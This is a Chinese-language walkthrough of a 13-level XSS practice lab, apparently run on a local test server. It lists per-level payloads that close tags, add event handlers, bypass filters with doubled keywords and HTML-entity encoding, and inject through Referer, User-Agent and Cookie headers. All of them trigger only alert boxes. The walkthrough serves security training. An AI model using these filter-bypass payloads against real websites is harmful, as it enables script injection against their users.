XSS小游戏【1-13关】

第一关

Payload:<script>alert(1)</script>

第二关

Payload:keyword=<script>alert(1)</script> 发现没有成功,F12发现需要闭合input 标签

再次输入payload:aaa"><svg οnlοad=alert(1)>

//当这个输入被插入到网页中时,浏览器会将其解析为HTML代码,并执行其中的JavaScript代码

第三关

Payload:<script>alert(1)</script>

Payload:' οnfοcus=javascript:alert('xss') ' 要点击搜索再次按下搜索框就会出现

第四关

payload:<script>alert(1)</script>

F12查看数据源码, 注入测试后,发现过滤了>和<

Payload:"οnclick="alert(111)

第五关

payload:"><a href='javascript:alert(1)'>aa</a>

最后点击那两个蓝色的aa,就会提示你过关

第六关

payload:"><a hReF='javascript:alert(1)'>aa</a>

第7关

Payload:"><a hhrefref='javascscriptript:alert(1)'>'aa'</a>

第八关

payload:&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41; 最后点击'友情链接'

第九关

payload:&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;//http://www.baidu.com

'添加友情链接->点击友情链接'

第十关

payload:?t_sort=" type="text" οnclick="alert(1)

第十一关(referer参数注入)

payload:referer:"type="text" οnclick="alert(1)

http://127.0.0.1/ljy22601239/xss/level11.php?keyword=good%20job!

第十二关(user-agent参数注入)

payload:User-Agent: "type="text" οnclick="alert(1)

第十三关(cookie参数绕过)

payload:Cookie: user="type="text" οnclick="javascript:alert(1)

保护cookie值,用到setcookie函数

相关推荐
hackeroink8 小时前
【2024版】最新推荐好用的XSS漏洞扫描利用工具_xss扫描工具
前端·xss
网络安全Jack3 天前
[网络安全]XSS之Cookie外带攻击姿势详析
安全·web安全·xss
儒道易行3 天前
【bWAPP】XSS跨站脚本攻击实战
前端·web安全·网络安全·xss
Ares-Wang6 天前
Web 安全 跨站 跨域 XSS CSRF
前端·安全·xss
网络安全成叔10 天前
XSS(跨站攻击)
网络·安全·网络安全·漏洞·xss
儒道易行11 天前
【DVWA】XSS(Stored)
前端·网络安全·xss
网络安全King11 天前
XSS Challenges
网络·安全·web安全·xss
AirDroid_qs11 天前
Pikachu-XSS靶场(通关攻略)
网络·xss
hongkid13 天前
使用Node.js防范XSS攻击:常用库及实例
前端·node.js·xss